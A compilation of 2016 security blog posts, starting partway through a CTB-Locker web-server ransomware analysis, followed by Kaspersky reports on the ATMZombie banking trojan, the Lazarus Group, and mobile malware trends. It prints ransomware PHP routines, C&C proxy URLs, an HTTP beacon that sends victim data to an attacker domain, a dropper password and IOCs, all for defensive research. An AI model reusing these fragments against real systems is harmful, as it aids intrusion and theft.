We still don’t know how the CTB-Locker is being deployed on web servers, but there is one common thing among many of the attacked servers – they use the WordPress platform as a content management tool. WordPress contains many vulnerabilities in its non-updated versions and we already seen critical vulnerabilities presented last year. In addition, WordPress also has another weak spot – plugins. Those tiny enhancement features helps WordPress become what it is – a leader in the world of CMS. However, having third party plugins also makes the server more vulnerable to attacks, as plugin authors are not committed to any type of security measurements.

Once the malware author is inside WordPress system, he is able to replace the main website file and execute the encryption routine. The main file is renamed and saved in an encrypted state.

Two different AES-256 keys are deployed to the victim server:

  1. create_aes_cipher($keytest) – encrypts the two files which can be decrypted free.
  2. create_aes_cipher($keypass) – encrypts the rest of the files hosted on the server web root.

The two files are chosen by the authors and their names are saved in a text file.

The create_aes_cipher() accepts one parameter as the key and sends it to the standard Crypt_AES() function:

function create_aes_cipher($key) { $aes = new Crypt_AES(); $aes-&gt;setKeyLength(256); $aes-&gt;setKey($key); return $aes; }

When encrypting the site, the script first uses the test key to encrypt the two files that will be used for free decryption. It will then generate a list of files that match specific file extensions and encrypt them using AES-256 encryption. The extensions that will be encrypted are read from the ./extensions.txt file and are currently:

Files that contain the following strings will be excluded from the encryption process:

  1. “/crypt/”
  2. “secret_”

In addition, files which are populated with data that will later assist the user with the decryption process would obviously be excluded as well.

  1. ./index.php – as described above, this file is the main door for the victim to analyze the attack and contains PHP code of the encryption/decryption routine.
  2. ./allenc.txt – contains a list of all encrypted files.
  3. ./test.txt – contains the files which are freely available for decryption.
  4. ./victims.txt – contains a list of all the files that are being encrypted or have already been encrypted.
  5. ./extensions.txt – contains the list of file extensions (see above).
  6. ./secret_ – as said, the victim is required to identify himself before the free decryption or chat is even possible.

On the main page of the CTB-Locker, attackers are using JQUERY to query proxy servers and verify payments. The following code was found in the page source code and the servers listed on the top are proxies which are used as another layer of protection, instead of the main server of the attackers:

Proxy servers which are part of the decryption process:

http://erdeni.ru/access.php http://studiogreystar.com/access.php http://a1hose.com/access.php

The ransomware servers are not permanent and are being replaced by new ones every certain period of time. We have identified the threat actor inspecting the server logs and analytics, as sometimes different checks resulted in the server shutting down and turned back on.

Step 3: proxy to C&C

The attackers are utilizing servers which were already attacked to traffic through another layer of protection. On a victim server’s source code, a JavaScript code reveals how the decryption process is sent through three different servers randomly, however those are not the C&C.

The above screenshot was taken from the access.php page, supposedly located in each one of the bot servers used as a proxy for the decryption process.

In white block is the actual C&C which has been hardcoded on each of the PHP pages (access.php).

When POST request is being sent with the right parameters, a socket instance is being created and sends a connect beam to the attacker’s C&C server. Later it is being determined if the decryption process succeeded.

Free decrypt

The ransomware allows the victim to freely decrypt not more than two files. It is not for the victim to choose, since the files are pre-chosen and can be found in the malware’s designated file as listed above. The two files are randomly picked during the course of the encryption process.

The following image is an illustration of the free decrypt module:

In order to decrypt the two free files, the victim is required to enter the secret_ file name. Once you click the DECRYPT IT FREE button, the client-side script builds a POST request and sends it to one of the C&C servers. We were able to imitate the PHP calculation and run the exit() function of the free decryption routine:

The following is the PHP code at the back-end. The function secret_ok() verifies the identity of the victim, based on his domain name and other indicators:

if (isset($_GET['dectest']) && secret_ok()) { decrypt_files('test.txt', $_GET['dectest']); exit('Congratulations! TEST FILES WAS DECRYPTED!!'); }

Threat actor’s chat room

The ransomware also includes functionality to communicate with the malware authors. As already said, the victim is required to use the secret_ key in order to open the chat. Without it, the chat will remain unresponsive.

We have come to the conclusion that ransomware is the new-generation malware for an attacker interested in financial gain. They are very effective, there is no solid solution against this threat thus far, and they are flexible to attack not only desktop operating systems, but now web servers as well.

We urge anyone to backup all important data; and to be cautious about emails which are not specifically meant for the user, or attractive ads that appear online. In addition, third party software must not be trusted automatically by its hash. This identifier can be changed by an attacker once a server has been compromised. Be sure to use other routine checks to ensure that the software is legitimate.

Don't Login on Untrusted Computers

SANS Tip of the Day - Tue, 03/01/2016 - 00:00
A password is only as secure as the computer or network it is used on. As such, never log in to a sensitive account from a public computer, such as computers in a cyber cafe, hotel lobby or conference hall. Bad guys target public computers such as these and infect them on purpose. The moment you type your password on an infected computer, these cyber criminals can harvest your passwords. If you have no choice but to use a public computer, change your password at the next available opportunity you have access to a trusted computer.

ATMZombie: banking trojan in Israeli waters

Malware Alerts - Mon, 02/29/2016 - 03:08

On November 2015, Kaspersky Lab researchers identified ATMZombie, a banking Trojan that is considered to be the first malware to ever steal money from Israeli banks. It uses insidious injection and other sophisticated and stealthy methods. The first method, dubbed “proxy-changing”, is commonly used for HTTP packets inspections. It involves modifying browser proxy configurations and capturing traffic between a client and a server, acting as Man-In-The-Middle.

Although this is efficient for testing, streaming bank details isn’t as easy. Banks are using encrypted channels, signed with authorized certificates, to prevent the data from being streamed in clear-text. The attackers, however, realized the missing piece and have since issued a certificate of their own, which is embedded in the dropper and is inserted in the root CA list of common browsers in the victim’s machine.

The method of using a “proxy-changer” Trojan to steal bank credentials has been around since the end of 2005, and is being actively used by Brazilian cybercriminals; however, it wasn’t until 2012 that Kaspersky Lab researchers compiled a full attack analysis. “In Brazil malicious PAC files in Trojan bankers have been increasingly common since 2009, when several families such as Trojan.Win32.ProxyChanger started to force the URLs of PAC files in the browser of infected machines.“, said Fabio Assolini, Senior Security Researcher at GReAT Kaspersky Lab, in his article.

A Kaspersky Lab researcher based in Russia had written about similar Trojan attacking PSB-retail customers, dubbed Tochechnyj Banker. It was even backed by a victim case study, where the victim explains how the crocks fooled him into handing out his credentials.

The incident Israeli banks experienced had the same characteristics, but had a very fascinating and innovative method of stealing the money. Instead of relying only on direct wire-transfer or trading credentials, their modus operandi started by leveraging a loophole in one of the bank’s online features; and later by physically withdrawing money from the ATM, assisting money mules (zombies) who are suspected to have no awareness of how the attack works; hence the Trojan was dubbed – ATMZombie.

The threat actor seems to be widely active in banking malware campaigns, as he was found to be registering domains for the following Trojans as well: Corebot, Pkybot and the recent AndroidLocker. However, none uses the same modus operandi. In addition, the actor is being tracked by a number of researchers and also runs rogue online services such as malware encryption and credit card dumps for sale.

Similar to the PSB-retail attack in 2012, the Retefe Banking Trojan, discovered by PaloAlto Networks last August, is quite like a big brother of ATMZombie. It contains an additional Smoke Loader backdoor, which ATMZombie lacks. The other similar banker is that identified by IBM Trusteer’s as Tsukuba.

The proxy configurations file must specifically detail the targets it is aiming at, thus it was fairly easy to spot them. The attack had successfully compromised hundreds of victim machines; however Kaspersky Lab was able to trace only a couple of dozen of them.

Bird view

The Trojan is dropped into the victim machine and starts the unpacking process. Once unpacked it stores certificates in common browsers (Opera, Firefox) and modifies their configurations to match a Man-In-The-Middle attack. It eliminates all possible proxies other than the malware’s and changes cache permissions to read-only. It than continues by changing registry entries with Base64 encoded strings that contain a path to the auto-configuration content (i.e. traffic capture conditions using CAP file syntax) and installs its own signed certificate into the root folder. Later it waits for the victim to login to their bank account and steals their credentials, logs in using their name and exploits the SMS feature to send money to the ATMZombie.

Analysis

After loading the malware executable with your favorite assembler level analysis debugger, it is possible to capture the virtual allocation procedure occurring in run-time. Putting breakpoints in the right instruction points will disclose the unpacked executable. Once the final routine is done, the MZ header will appear in memory. There are many techniques and tools, but this method was enough to unpack the malware.

Looking into the malware assembly code, we were able to identify a number of strings that were embedded in the data section for a reason. The first we spotted was a Base64 string containing a chunk of an outbound communication URL, meant to be embedded in a number of registry entries.

The string decodes to:

http://retsback.com/config/cfg.pac

Side note: It is not the PAC file that is being embedded in the browser network configuration; thus we believe that it was generated by the attacker as a backup, in case the original PAC fails.

Two other Base64 strings we found were the PAC, which was embedded in the browser network configuration; and another type of URL, which indicated the type of lateral movement the threat actor chose.

The URL in the Base64 string was appended to an HTTP request which was detected as an attempt to fingerprint the sandbox. The empty parameters are fed with the Windows ProductID, the binary’s name and an integer between one and five. The integer is the level of integrity that the malware was assigned for; where (1) is untrusted level and (5) is system level. Along with those three dynamic values is a static version value.

GET
/z/rtback.php?id=[WindowsProductID]&ver=0000002&name=[malware_filename]&ilvl=[integrity_level] HTTP/1.1
Host: retsback.com
Cache-Control: no-cache

Inspecting the binary, we found that it uses a certificate to stream data over HTTPS and securely steal the victim’s credentials.

After embedding the above certificate and proxy configurations in the victim’s machine, the browser is set to route the communication via the attackers’ server when the victim decides to login to his bank.

The victim was not only lured into downloading the malware for being a client of Israeli banks, but was also targeted for being a client of a specific bank in Israel. This requires either very good intelligence-gathering techniques or an insider that can, legitimately or not, get a hold of the list of clients. When a list of that nature is being assembled, the hunt becomes very efficient and the attackers are able to craft each email or link to a specific victim or bank.

The following is a full pseudo code of the malware:

Stepping out of the rabbit hole

The malware is only the first step of the attack. The second step involves a manual login to the hijacked accounts and submission of a wire-transfer to the account of the money mule. This is a crucial step, since crossing this step means that the malware has successfully finished its role in the attack.

Logging manually into the victim’s bank account is not something to take lightly. Many banks around the world are fingerprinting devices to make sure that the user is logging in from a trusted machine. For untrusted machines, the bank will issue extended protection mechanisms to prevent the exact attack detailed in this article. In addition, banks track anomalies and send alerts to its information security personnel.

Before victims get to the phase where they call the bank’s support team to declare that money has gone missing, the attacker issues a money transfer to the money mule’s cell phone number and Israeli Personal Identifiable Information (PII). We dubbed the money mule “Zombie”, as part of an investigation in which he found that youngsters were lured into withdrawing cash from the ATMs, in return for receiving a small amount of it. Later, they sent the rest of the money via different media, such as a post office. The campaign was named after the money mules and the technique they were instructed to use.

The technique allowed the attackers to stay anonymous and supervise the entire campaign remotely. It also points to a new type of attack, where attackers control residents of a country to operate as an insider and deliver a basic service. This service might cause its executor to be accused for committing a crime; however, the chance of proving that they were aware of the entire operation is close to none. After all, they are not doing anything malicious.

From reading the bank’s instruction, a non-registered user can study the five-year old feature and analyze the possibility of including it in the attack as a way to wire money. This feature is called “SMS transaction”; and it has been widely used for the past few years, allowing parents, for example, to send money to kids who have no credit card, while they serve in the military or study at school.

Along with a few more unique details, such as Date, Israeli ID, Name and Amount the owner of the phone will be provided with an SMS message that authorizes the cash withdraw.

Kaspersky Lab found an innovative way to protect against the proxy-changer that has existed for several years. It can be found here.

Israeli banks involved in the incident successfully stopped the attack using, among other data, the information they received from Kaspersky Lab regarding the attacker, the malicious activity and the victims.

FAQs

Q: Was the attack targeted at Israeli banks?

A: Yes

Q: Was money stolen from the banks or from victims’ accounts?

A: The money was stolen from victims’ accounts, but the bank compensated each victim. In conclusion, the bank was the one to lose revenue.

Q: Was the attack stopped completely?

A: As far as we know, the banks were able to stop the attack completely and compensate the victims.

Q: How many victims were in the attack?

A: The Kaspersky Security Network (KSN) showed dozens of victims; however, we estimate that the total number of victims reached a couple of hundreds.

Q: How much money was stolen?

A: The highest amount for one transaction was approximately 750$. We were able to find a number of money mules, about 10 different malicious binaries, and a number of banks who were victims of this attack. With this information we estimate that hundreds of thousands of dollars were stolen in this short period of time. If not for the vast investigation led, among others, by Kaspersky Lab, the amounts stolen could have soared to much larger numbers.

Q: Were the police part of the investigation?

A: We are not aware of any investigation details.

Q: In regards to attribution, who is the attacker?

A: Kaspersky Lab does not seek attribution; however, the company’s researchers have sent all the information to law enforcement to help in catching the criminals behind the campaign.

Q: What can I do to stay protected?

A: Make sure you have anti-malware product installed and install the latest patches.

IPs

91.230.211.206
185.86.77.153
91.215.154.90
88.214.236.121

Domains

retsback.com
updconfs.com
systruster.com
msupdcheck.com

Samples 6d11090c78e6621c21836c98808ff0f4 Trojan-Banker.Win32.Capper.zym 4c5b7a8187475be251d05655edcaccbe Trojan-Banker.Win32.Capper.zyt c0201ab2a45bc0e17ebd186059d5a59e Trojan-Banker.Win32.Capper.zyk 47b316e3227d618089eb1625c4202142 Trojan-Banker.Win32.Capper.zyl 84bb5a77e28b3539a8022bc3612d4f4c PAC file example d2bf165284ab1953a96dfa7b642637a8 Trojan-Banker.Win32.Capper.zyp 80440e78a68583b180ad4d3e9a676a6e Trojan-Banker.Win32.Capper.zyq d08e51f8187df278296a8c4ff5cff0de Trojan-Banker.Win32.Capper.zyg efa5ea2c511b08d0f8259a10a49b27ad Trojan-Banker.Win32.Capper.zys 13d9352a27b626e501f5889bfd614b34 Trojan-Banker.Win32.Capper.zyf e5b7fd7eed59340027625ac39bae7c81 Trojan-Banker.Win32.Capper.zyj

Operation Blockbuster revealed

Malware Alerts - Wed, 02/24/2016 - 08:10

Kaspersky Lab has joined industry alliance driven by Novetta to announce Operation Blockbuster. Just like the previous Operation SMN, this alliance brings together key players in the IT security industry, working together in an effort to disrupt and neutralize multiple cyberespionage campaigns that have been active for several years. Some of the targets of these campaigns included financial institutions, media houses and manufacturing companies, among others.

In the past, we published our research into the malware that was publicly attributed to the Sony Pictures (SPE) hack. Building on that data, Kaspersky Lab conducted more focused research into a cluster of related campaigns stretching back several years before the SPE incident. That cluster involves several malware families as well as campaigns that have not received media attention and were previously considered unrelated. By focusing primarily on instances of code-reuse and leveraging the power of Yara, Kaspersky researchers were able to proactively spot new malware variants produced by the same threat actor, codenamed by Novetta ‘The Lazarus Group’. For instance, past and current activity that we attribute to the Lazarus Group includes Wild Positron, which is also known publicly as Duuzer.

Some of our findings about Wild Positron and other associated operations were initially presented to a select audience at our Security Analyst Summit (SAS) in Tenerife, Spain, through a joint presentation between researchers from Kaspersky’s Global Research and Analysis Team and AlienVault Labs’ Research Team. Today, as part of Operation Blockbuster, together with Novetta and other industry partners, we are publishing our findings for the benefit of the wider public.

Technical highlights of SAS findings

The Lazarus Group’s activity spans multiple years, going back as far as 2009. However, their activity spikes starting with 2011. The group deployed multiple malware families throughout the years, including malware associated with Operation Troy and DarkSeoul, the Hangman malware (2014-2015) and Wild Positron / Duuzer (2015). The group is known for spearphishing attacks, which include CVE-2015-6585, which was a zero-day vulnerability at the time of discovery.

During our analysis of the malware from the SPE attack as well as the connected malware families mentioned above, we observed certain specific traits shared between samples used in separate attacks. In general, such similarities are instances of code sharing and indicate the existence of a relationship between the malware families, which can be used to paint a more complete picture of a threat actor. We describe some of these overlapping features below.

Network functionality

Rather than focus on the specific functionality of any given piece of malware, we focused on hunting for as many related malware as possible in order to better understand the practices of this threat actor. Studying multiple coding quirks within any given malware variant actually revealed these to be coding conventions implemented across both different malware families as well as entirely new samples. A simple example of code reuse is the networking functionality that includes a half-dozen hard-coded user-agents with the misspelling ‘Mozillar’ instead of Mozilla.

Misspelled Hardcoded User-Agent

This same user-agent appears across a variety of malware families including the original Destover as well as multiple loosely related variants of Hangman, a new campaign targeting Domain Controllers, and the Sconlog/SSPPMID samples.

Self-deleting scripts

Placeholder strings in the dropper (left) and the resulting self-delete bat file (right)

Another interesting convention is the use of BAT files to delete components of the malware after infection. These BAT files are generated on the fly and, while they serve their purpose of eliminating initial infection traces, they ironically double as a great way to identify the malware itself by honing in on the path-placeholder strings that generate the randomly-named BAT files on the infected systems. This convention is found across the widest berth of Hangman/Volgmer variants as well as a wealth of thus-far uncategorized samples from stretching from as far back as 2012/2013.

Basic anti-analysis techniques

Password-protected ZIP resource containing malware payload

A high-confidence indicator of correlation is the reuse of a shared password across malware droppers used to drop different malware variants. The droppers all kept their payloads within a password-protected ZIP under the resource name ‘MYRES’. The dropper contains the hardcoded password ‘!1234567890 dghtdhtrhgfjnui$%^^&fdt‘ making it trivially easy for an analyst to reach the payload. The purpose, of course, is not to stymie seasoned analysts but to halt automated systems from extracting and analyzing the payload.

Avid watchers

Hardcoded sandbox hostnames in latest iterations of the Lazarus Group malware

The target of this investigation is far from unaware of the efforts of security practitioners and AV vendors interested in their practices. Apart from including simple anti-analysis techniques, the Lazarus group’s latest malware now include a custom-tailored list of computer hostnames to watch out for. These hostnames belong to sandbox execution systems likely commonly executing their malware for the sake of generating detections. List of sandbox names have been made available on attacker forums or open blog posts. The interesting thing is that the Lazarus group’s list of sandbox hostnames includes the following:

‘XELRCUZ-AZ’ ‘RATS-PC’ ‘PXE472179’

These are three presumed sandbox hostnames unavailable in any public lists we’ve been able to identify. The attackers most likely collected these during the execution of their malware and decided to retaliate by adding logic to avoid execution on these systems. This displays a level of awareness of an attacker that is cognizant of the playing field and adapting to outwit their adversaries in the security industry.

Attacker activity

Profiling the PE compilation timestamps can provide security researchers with a method to identify the attacker’s activity throughout the years. This can be used to understand if the group’s efforts are increasing, decreasing or if certain blind spots exist.

Based on the analysis of several samples that we strongly associated with the group, we conclude the activity has been steadily growing since 2013.

Analysis of the working hours provide a possibly even more interesting pictures:

The group appears to start working around midnight (00 hrs GMT) and breaks for lunch around 3am GMT. Considering normal working hours, this indicates the attackers are probably located on a timezone of GMT+8 or GMT+9.

What is perhaps most surprising is the amount of sleep they get – which is roughly about 6-7 hours per night. This indicates a very hard working team, possibly more hard working than any other APT group we’ve analysed.

Language usage and attribution

Of course, one of the top questions here is who is behind the Lazarus group and is it a nation-state sponsored attacker?

Instead of speculating on the origin of these attacks, we prefer to provide technical facts and let the reader draw their own conclusions.

Out of the Lazarus group reference sample set compiled by our partner Novetta, just over 60% (61.9%) of them have at least one PE resource with Korean locale or language.

The analysis of the metadata extracted from several thousand samples shown above seems to indicate the attackers are probably located on a timezone of GMT+8 or GMT+9.

Additionally, many of the attacks in the past seemed to target institutions in South Korea, such as in the case of DarkSeoul. Coupled with the usage of a Hangul Word Processor zero-day by the attackers also seems to indicate that South Korea is one of their top interests.

Victim information

Based on KSN analysis and reports, we were able to put together a map with the most affected regions and countries by the Lazarus group malware. To create the map, we took the reference samples set from Novetta, removed the shared hacking tools (such as Process Hacker) and cross referenced them with KSN detections from the last twelve months. It should be noted that due to the large amount of samples (more than 1000), these detections can include researchers analysing the malware as well as multi-scanners or victims connecting by VPNs. Additionally, for such a large number of samples and detections, the geography can be influenced by the geographical popularity/distribution of Kaspersky Lab products; for instance, while many of the Lazarus group attacks were directed at targets in South Korea, our customer base there is relatively small and doesn’t offer a solid perspective on the infections there.

Finally, some of the malware from the Lazarus group appears to be self-spreading (worms) which affect the overall statistics if we look at it from a targeted attacks point of view.

Nevertheless, these statistics provide an overall image of Lazarus group malware detections as observed by our products over the last 12 months.

Conclusions

Our research into the Lazarus group conducted over the past several years confirms the existence of a connection between various campaigns such as Operation DarkSeoul, Operation Troy and the SPE, which we believe to be fitting under the umbrella of a single threat actor. Their focus, victimology, and guerilla-style tactics indicate a dynamic, agile and highly malicious entity, open to data destruction in addition to conventional cyberespionage operations.

During the last two years, the number of destructive attacks has grown considerably. We’ve written about some of them in our blog ‘Five Wipers in the Spotlight‘. As observed in these incidents, this kind of malware proves to be a highly effective type of cyber-weapon. The power to wipe thousands of computers at the push of a button represents a significant bounty to a CNE team tasked with disinformation and the disruption of a target enterprise. Its value as part of hybrid warfare, where wiper attacks are coupled with kinetic attacks to paralyze a country’s infrastructure remains an interesting thought experiment closer to reality than we can be comfortable with.

As we predicted, the number of wiper attacks grows steadily. It will continue to rise exponentially as media and governments respond in a way that raises the profile of the perpetrators in a politically beneficial manner. Millions of dollars in losses, disabled operational capabilities, and reputational loss will continue to haunt the victims in the wake of the Lazarus group and other actors willing to perpetrate these devastating attacks.

Together with our industry partners, we are proud to put a dent in the operations an unscrupulous actor willing to leverage these devastating techniques.

Mobile malware evolution 2015

Malware Alerts - Tue, 02/23/2016 - 06:00

The year in figures

In 2015, Kaspersky Lab detected the following:

  • 2,961,727 malicious installation packages
  • 884,774 new malicious mobile programs – a threefold increase from the previous year
  • 7,030 mobile banking Trojans
Trends of the year
  • Rise in the number of malicious attachments the user is unable to delete.
  • Cybercriminals actively using phishing windows to conceal legitimate apps.
  • Growth in the volume of ransomware.
  • Programs using super-user rights to display aggressive advertising.
  • Increase in the quantity of malware for iOS.
Main methods of monetization

Mobile malware continues to evolve towards monetization, with malware authors trying to ensure their creations are capable of making money from their victims.

Stealing money from user bank accounts

Mobile Trojans targeting user bank accounts continue to develop – in 2015, we detected 7,030 new mobile banking Trojans. Some malicious mobile programs work in combination with Windows-based Trojans to capture mTAN passwords (one-time passwords used in two-factor authentication) that are used for authorizing bank transactions. Many of the other mobile programs used to steal money from user bank accounts operate independently.

Some mobile malware is capable of overlaying the on-screen display of a legitimate banking app with that of a phishing window that imitates the app. The most notable examples of this type of program are Trojan Trojan-SMS.AndroidOS.OpFake.cc and the representatives of the Trojan-Banker.AndroidOS.Acecard family. One of the OpFake.cc modifications can imitate the interface of more than 100 legitimate banking and finance apps. The Acecard family can imitate at least 30 banking apps and also has functionality to overlay any app that the C&C server commands.

In Q2 2015, we wrote about Trojan-Spy.AndroidOS.SmsThief.fc whose malicious code was embedded in a legitimate banking app without affecting its performance. This meant it was highly unlikely a user would notice the malware.

The authors of mobile malware are taking an increasingly integrated approach to stealing money: it is no longer limited to special banking Trojans targeting banking apps.

An example of this approach is Trojan-SMS.AndroidOS.FakeInst.ep. What the users see is a message, purportedly from Google, demanding that they open Google Wallet and go through an ‘identification’ procedure that involves entering their credit card details (one of the reasons given is the need to combat cybercrime). The window cannot be removed until the victim enters their credit card details.

Once users enter the required data, it is sent to attackers, and the window closes. Meanwhile, the Trojan continues to steal information and send additional information to its owners about the smartphone and its user.

Against a background of slowing growth in the number of specialized banking Trojans, the total number of apps that can steal money from users is growing. This comes at a time when banking Trojans are becoming more sophisticated and versatile – they are often capable of attacking customers of dozens of banks located in a variety of countries. This means cybercriminals do not need lots of different files to attack the customers of different banks.

Ransomware

The amount of Trojan-Ransom families doubled in 2015 compared to the previous year, while the number of detected modifications increased 3.5 times. This means some criminals are switching to ransomware to steal money, and those who were already doing so are continuing to create new versions of the malware. Yet another key indicator confirming the importance of this class of threat is the number of people who were attacked: in 2015, this figure increased fivefold.

In most cases when these Trojans block a device, the user is accused of committing some alleged misdemeanor, and has to pay to unblock the device – the ransom can range from $12 to $100. The blocked device is rendered inoperable – the user only sees a window with the ransom demand. Some Trojans are capable of overlaying system dialog boxes, including those used to switch off the phone.

The window opened by Fusob

At the end of the year we detected several Trojan downloaders that downloaded Trojan-Ransom.AndroidOS.Pletor in the system. These Trojan downloaders exploit vulnerabilities in the system to gain super-user privileges on the device and install Trojan-Ransom malware in the system folder. Once installed, this Trojan is almost impossible to remove.

SMS Trojans remained a serious threat, particularly in Russia. These programs send paid text messages from an infected device without the user being aware. Although their share in the overall flow of mobile threats continues to decline, the number of SMS Trojans in absolute terms remains substantial.

Some SMS Trojans are not limited to the sending of text messages to premium numbers; they can also connect the user to paid subscriptions. In 2015, we kept track of how Trojan-SMS.AndroidOS.Podec – still one of the most popular Trojans among cybercriminals – was developing. This Trojan boasts an unusual feature: its main method of monetization is paid subscriptions. It is capable of bypassing Captcha, and its latest modifications have “lost” the ability to send text messages as its creators have focused on subscriptions.

Aggressive advertising

In 2015, we recorded an increase in the number of programs that use advertising as the main means of monetization. The trend of the year was Trojans using super-user privileges. In the first quarter of 2015, the mobile malware TOP 20 contained just one Trojan of this type; by the end of the year they made up more than half of the rating. Despite the fact that these Trojans are designed to download and install advertising applications without the user’s knowledge, they can cause a lot of problems. Once installed, they try to root the device and install their own components in the system making them difficult to remove. Some of them remain on a smartphone even after resetting to factory settings. As a result, the user is inundated with annoying ads on the device. They can also install lots of other programs, including malware, on the device without the user being aware. There have been cases of this type of program being distributed in the official firmware of devices or being pre-installed on new phones.

Malware in official stores

In early October 2015 we came across several Trojans in the official Google Play Store that stole user passwords from the Russian social network VKontakte. These were Trojan-PSW.AndroidOS.MyVk.a and Trojan-PSW.AndroidOS.Vkezo.a. About a month later we detected a new modification of the Trojan Vkezo which was also distributed via Google Play Store. The attackers published these Trojans 10 times in the official app store under different names over a period of several months. The number of downloads for all versions of these Trojans was put at between 100 000 and 500 000. Yet another Trojan detected in Google Play Store was Trojan-Downloader.AndroidOS.Leech; it was also downloaded between 100 000 and 500 000 times.

Malware for iOS

In 2015, the number of malicious programs for iOS increased 2.1 times compared to 2014.

The recent emergence of malicious apps in the App Store once again demonstrated that, contrary to popular belief, iOS is not invulnerable to malware. The attackers did not hack App Store, but instead posted a malicious version of Apple’s Xcode, a free set of tools that developers use to create applications for iOS, on the Internet.

Apple’s Xcode is officially distributed by Apple, but it is unofficially spread by third parties. Some Chinese vendors prefer to download the development tools from local servers. Someone posted an Xcode version containing malicious XcodeGhost on a third-party server in China. Malicious code is embedded in any application compiled using this version of Xcode.

XcodeGhost infected dozens of applications. Initially it was thought that 39 infected apps had bypassed the Apple testing procedure and had been successfully downloaded to the App Store. The most popular of them was WeChat, a free messenger installed on more than 700 million user devices. Apple removed the infected apps. However, the hacked version of Xcode was available for about six months, so the total number of infected applications might be much higher, not least because the source code for XcodeGhost was published on Github.

In early June, Trojan.IphoneOS.FakeTimer.a, a malicious program for iPhone, was detected. The Trojan targets users in Japan and can be installed on any iPhone because the attackers used an enterprise certificate to sign the Trojan. The malicious program uses phishing techniques to steal money. A similar version of the Trojan for Android – Trojan.AndroidOS.FakeTimer.a.that – has already been around for several years.

Statistics

In 2015, the volume of mobile malware continued to grow. From 2004 to 2013 we detected nearly 200,000 samples of malicious mobile code. In 2014 there were 295,539 new programs, while the number was 884,774 in 2015. These figures do not tell the whole story because each malware sample has several installation packages: in 2015, we detected 2,961,727 malicious installation packages.

From the beginning of January till the end of December 2015, Kaspersky Lab registered nearly 17 million attacks by malicious mobile software and protected 2,634,967 unique users of Android-based devices.

The number of attacks blocked by Kaspersky Lab solutions, 2015

The number of users protected by Kaspersky Lab solutions, 2015

Geography of mobile threats

Attacks by malicious mobile software were recorded in more than 200 countries.

The geography of mobile threats by number of attacked users, 2015

The number of recorded attacks greatly depends on the number of users in a country. To evaluate the danger of infection by mobile malware in various countries we calculated the percentage of our users who encountered malicious applications in 2015.

TOP 10 countries by the percentage of attacked users

Country % of attacked users* 1 China 37 2 Nigeria 37 3 Syria 26 4 Malaysia 24 5 Ivory Coast 23 6 Vietnam 22 7 Iran 21 8 Russia 21 9 Indonesia 19 10 Ukraine 19

* We excluded those countries in which the number of users of Kaspersky Lab mobile security products over the reported period was less than 25,000.
** The percentage of attacked unique users as a percentage of all users of Kaspersky Lab mobile security products in the country

China and Nigeria topped the ranking, with 37% of users of Kaspersky Lab mobile security products in those countries encountering a mobile threat at least once during the year. Most of the attacks on users in Nigeria were carried out by advertising Trojans such as the Ztrorg, Leech, and Rootnik families that make use of super-user privileges, as well as by adware.

In China, a significant proportion of the attacks also involved advertising Trojans, but the majority of users encountered the RiskTool.AndroidOS.SMSreg family. Careless use of these programs can lead to money being withdrawn from a mobile account.

Types of mobile malware

Over the reporting period, the number of new AdWare and RiskTool files detected grew significantly. As a result, their share in the distribution of new mobile malware by type also increased noticeably – from 19.6% and 18.4% to 41.4% and 27.4%, respectively.

Distribution of new mobile malware by type in 2014 and 2015

When distributing adware programs, rather primitive methods are used to attract the attention of users to the advertisements: apps are created using the icons and names of popular games or useful programs. Of course, there are lots of popular games and legitimate applications, so a lot of fake advertising apps can be generated. The more fake applications that are used, the more effective the monetization of click activity is. Yet another way of distributing adware is by embedding an advertising module in a legitimate application. This can be done by the author of the application as well as by those who want to make money by exploiting an app’s popularity: when the advertising module is embedded in a clean app without the author’s knowledge, the profits from advertising go to those who added the advert, not the author. Unlike fake apps, this complex app contains some useful functionality.

The growth in the volume of adware is caused by the increasing competition among developers of these programs. The legitimate programs that use various advertising modules are often too aggressive. Increasingly, advertising modules are delivering as much advertising as possible to the user in a variety of ways, including the installation of new adware programs. Sometimes the adware programs installed on a device can make it almost impossible to use because the user is constantly fighting with advertising windows.

RiskTool programs are especially popular in China. This is because SMS payments for content are very popular in the country. Almost any game that includes so-called internal purchases (for additional levels of a game, for example) contains an SMS payment module. In most cases, the user is notified about the potential risks associated with such purchases, but we also consider it necessary to inform our users about the risks. Because the games in question are popular, the number of RiskTool applications is constantly increasing. The main contributor to that growth was the RiskTool.AndroidOS.SMSReg family of programs.

Although AdWare and RiskTool programs do not cause direct harm to users, they can be very irritating, while RiskTool programs installed on mobile devices can lead to financial losses if used carelessly or manipulated by a cybercriminal.

The proportion of SMS Trojans in the overall flow of mobile threats decreased almost 2.4 times – from 20.5% to 8.7%. However, in 2015 we detected even more new SMS Trojans than in 2014. Activity by this type of malicious program dropped drastically in mid-2014. This was the result of an AoC (Advice-of-Charge) system being introduced by Russian operators that led to a reduction in the number of so-called affiliate programs distributing SMS Trojans, the majority of which targeted users in Russia.

Top 20 malicious mobile programs

Please note that the ranking of malicious programs below does not include potentially unwanted programs such as RiskTool or AdWare.

Name % of all attacked users* 1 DangerousObject.Multi.Generic 44.2 2 Trojan-SMS.AndroidOS.Podec.a 11.2 3 Trojan-Downloader.AndroidOS.Leech.a 8.0 4 Trojan.AndroidOS.Ztorg.a 7.6 5 Trojan.AndroidOS.Rootnik.d 6.9 6 Exploit.AndroidOS.Lotoor.be 6.1 7 Trojan-SMS.AndroidOS.OpFake.a 5.6 8 Trojan-Spy.AndroidOS.Agent.el 4.0 9 Trojan.AndroidOS.Guerrilla.a 3.7 10 Trojan.AndroidOS.Mobtes.b 3.6 11 Trojan-Dropper.AndroidOS.Gorpo.a 3.6 12 Trojan.AndroidOS.Rootnik.a 3.5 13 Trojan.AndroidOS.Fadeb.a 3.2 14 Trojan.AndroidOS.Ztorg.pac 2.8 15 Backdoor.AndroidOS.Obad.f 2.7 16 Backdoor.AndroidOS.Ztorg.c 2.2 17 Exploit.AndroidOS.Lotoor.a 2.2 18 Backdoor.AndroidOS.Ztorg.a 2.0 19 Trojan-Ransom.AndroidOS.Small.o 1.9 20 Trojan.AndroidOS.Guerrilla.b 1.8

* Percentage of users attacked by the malware in question, relative to all users attacked

First place is occupied by DangerousObject.Multi.Generic (44.2%), used in malicious programs detected by cloud technologies. Cloud technologies work when the antivirus database contains neither the signatures nor heuristics to detect a malicious program, but the cloud of the antivirus company already contains information about the object. This is basically how the very latest malware is detected.

Trojan-SMS.AndroidOS.Stealer.a, which was the TOP 20 leader in 2014, came 28th in 2015.

